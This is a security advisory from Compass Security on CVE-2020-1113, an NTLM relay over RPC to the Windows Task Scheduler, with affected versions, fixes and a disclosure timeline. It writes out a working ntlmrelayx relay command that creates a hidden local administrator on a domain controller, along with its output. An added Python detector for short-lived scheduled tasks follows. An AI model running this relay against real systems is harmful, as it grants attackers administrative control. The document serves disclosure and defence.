Microsoft Windows Task Scheduler Security Feature Bypass

Posted May 15, 2020
Authored by Sylvain Heiniger

Compass Security identified a security feature bypass vulnerability in Microsoft Windows. Due to the absence of integrity verification requirements for the RPC protocol and in particular the Task Scheduler, a man-in-the-middle attacker can relay his victim's NTLM authentication to a target of his choice over the RPC protocol. Provided the victim has administrative privileges on the target, the attacker can execute code on the remote target.

tags | exploit, remote, protocol, bypass
systems | windows
advisories | CVE-2020-1113
SHA-256 | 16fcf81541831c6f1a2109c00a1d366d79871db6b8aecafaba474512db27d1b8

################################################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
################################################################################
#
# Product: Windows Task Scheduler
# Vendor: Microsoft
# CSNC ID: CSNC-2010-001
# CVE ID: CVE-2020-1113
# Subject: Security Feature Bypass
# Risk: High
# Effect: Remotely exploitable
# Authors: Sylvain Heiniger <sylvain.heiniger@compass-security.com>
# Date: 14.05.2020
#
################################################################################

Introduction:
-------------
NTLM relay attacks are well-known for privilege escalation in Windows networks.

Compass Security identified a security feature bypass vulnerability in
Microsoft Windows. Due to the absence of integrity verification requirements
for the RPC protocol and in particular the Task Scheduler, a man-in-the-middle
attacker can relay his victim's NTLM authentication to a target of his choice
over the RPC protocol. Provided the victim has administrative privileges on
the target, the attacker can execute code on the remote target.

Affected:
---------
Vulnerable:
* Windows 7
* Windows 8.1
* Windows 10
* Windows Server 2008
* Windows Server 2008 R2
* Windows Server 2012
* Windows Server 2016
* Windows Server 2019

For details about the affected versions and the relevant update, please refer
to Microsoft's website [1].

Technical Description:
----------------------
To the best of our knowledge, there is currently no way to require signing on
RPC connections, so relay attacks can be performed over RPC. A hardened
system where a classical SMB relay attack would fail is still vulnerable to an
attacker who can relay HTTP, SMB or RPC connections to RPC.

MS-TSCH is the RPC protocol used to manage scheduled tasks. The protocol does
not specify any requirement for the server to check the integrity of received
data.

Our modified version of impacket [2] includes a new RPCRelayServer and
RPCRelayClient as well as an RPCAttack (based on ATExec). In our setup, the
attacker machine has the IP 172.16.100.21 while the victim machine DC is a
Windows Server 2016 with the IP 172.16.100.1.

We run the ntlmrelayx tool with the arguments -t and -c to specify the target
and the command:
# ntlmrelayx.py -ip 0.0.0.0 -t rpc://172.16.100.1 -c "net user compass
StrongPass.123 /add && net localgroup Administrators compass /add"
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Running in relay mode to single host
[*] Setting up RPC Server
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Servers started, waiting for connections
...

Trigger a connection to the attacker machine. In this case the user
WINLAB\scooper-da, who is in the local Administrators group of the DC machine,
makes an SMB connection from the machine with IP 172.16.100.14 to the attacker
machine on IP 172.16.100.21.
# net view \\172.16.100.21\noshare\

The tool picks up the connection and relays it:
...
[*] SMBD-Thread-4: Received connection from 172.16.100.14, attacking
target rpc://172.16.100.1
[*] Authenticating against rpc://172.16.100.1 as WINLAB\scooper-da SUCCEED
[*] Trying to execute specified command (net user compass StrongPass.123
/add && net localgroup Administrators compass /add)
[*] Creating task \WeumPsdH
[*] Running task \WeumPsdH
[*] Deleting task \WeumPsdH

As a result, the given command is executed on the target (through a scheduled
task that is created, run and immediately deleted) and a new local
administrator is created.
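The relay leaves a distinctive trace on the target: a scheduled task with a
bare random name is registered and deleted within seconds, under an account
whose logon session was established over the network from a host that is not
that user's own workstation. The following detection is an added example
written for this advisory; it is not part of the advisory or of impacket. It
runs over a handful of constructed Windows Security events (IDs 4624, 4698 and
4699, which require "Audit Other Object Access Events" to be enabled) whose
account and IP addresses are taken from the lab setup above, and flags the
create-then-delete pattern.

```python
"""Flag short-lived scheduled tasks created under a network logon session.

Added example for the MS-TSCH relay described above; not code from the
advisory or from impacket. The events below are constructed sample data.
"""
import re
from datetime import datetime, timedelta

# Constructed events modelled on Security log IDs 4624 (logon),
# 4698 (scheduled task created) and 4699 (scheduled task deleted).
# The relayed session arrives from the attacker IP, not from scooper-da's
# workstation; the second session is a benign interactive admin logon.
SAMPLE_EVENTS = [
    {"time": "2020-05-14T10:00:01", "id": 4624, "user": "WINLAB\\scooper-da",
     "logon_type": 3, "src_ip": "172.16.100.21", "logon_id": "0x3E7A1"},
    {"time": "2020-05-14T10:00:02", "id": 4698, "user": "WINLAB\\scooper-da",
     "task": "\\WeumPsdH", "logon_id": "0x3E7A1"},
    {"time": "2020-05-14T10:00:04", "id": 4699, "user": "WINLAB\\scooper-da",
     "task": "\\WeumPsdH", "logon_id": "0x3E7A1"},
    {"time": "2020-05-14T11:30:00", "id": 4624, "user": "WINLAB\\backupadmin",
     "logon_type": 2, "src_ip": "-", "logon_id": "0x5A100"},
    {"time": "2020-05-14T11:30:10", "id": 4698, "user": "WINLAB\\backupadmin",
     "task": "\\Nightly Backup", "logon_id": "0x5A100"},
]

# A task name that is nothing but letters, like \WeumPsdH in the output above.
RANDOM_NAME = re.compile(r"^\\?[A-Za-z]{6,16}$")


def looks_random(task_name):
    """Heuristic: a bare run of letters (no digits, spaces or separators)
    with both upper and lower case mixed after the first character."""
    if not RANDOM_NAME.match(task_name):
        return False
    body = task_name.lstrip("\\")[1:]
    return any(c.isupper() for c in body) and any(c.islower() for c in body)


def find_short_lived_tasks(events, max_lifetime=timedelta(seconds=60)):
    """Return one finding per task that was created and deleted within
    max_lifetime, enriched with the source IP of the session's logon when
    that logon was a network logon (type 3)."""
    logons = {e["logon_id"]: e for e in events if e["id"] == 4624}
    created = {}   # (logon_id, task name) -> creation time
    findings = []
    for e in sorted(events, key=lambda ev: ev["time"]):
        when = datetime.fromisoformat(e["time"])
        key = (e.get("logon_id"), e.get("task"))
        if e["id"] == 4698:
            created[key] = when
        elif e["id"] == 4699:
            start = created.pop(key, None)
            if start is None or when - start > max_lifetime:
                continue
            logon = logons.get(e["logon_id"])
            network_src = None
            if logon is not None and logon["logon_type"] == 3:
                network_src = logon["src_ip"]
            findings.append({
                "user": e["user"],
                "task": e["task"],
                "lifetime_s": (when - start).total_seconds(),
                "random_name": looks_random(e["task"]),
                "network_logon_from": network_src,
            })
    return findings


if __name__ == "__main__":
    for f in find_short_lived_tasks(SAMPLE_EVENTS):
        print("short-lived task {task} by {user}: lived {lifetime_s:.0f}s, "
              "random name={random_name}, network logon from "
              "{network_logon_from}".format(**f))
```

The benign "Nightly Backup" task is never deleted and was registered from an
interactive session, so it produces no finding; only the relayed session is
reported, together with the IP the NTLM authentication actually arrived from,
which is the value to compare against the account's known workstation.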

Workaround / Fix:
-----------------
* Patch your Windows systems.
* Enforce packet signing for clients and servers via GPO.
* Check your Active Directory ACLs: apply the least-privilege principle.
* Network segmentation can help prevent relay attacks.

Timeline:
---------
2020-01-27: Discovery by Sylvain Heiniger
2020-01-29: Initial vendor notification
2020-01-29: Initial vendor response
2020-02-13: Vendor acknowledgement
2020-04-16: CVE-2020-1113 assigned
2020-05-12: Release of fixed version as part of Patch Tuesday [1]
2020-05-14: Public disclosure
2020-06-14: Proof-of-concept code disclosure [3]

References:
-----------
[1] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1113
[2] https://github.com/SecureAuthCorp/impacket
[3] https://github.com/CompassSecurity/impacket

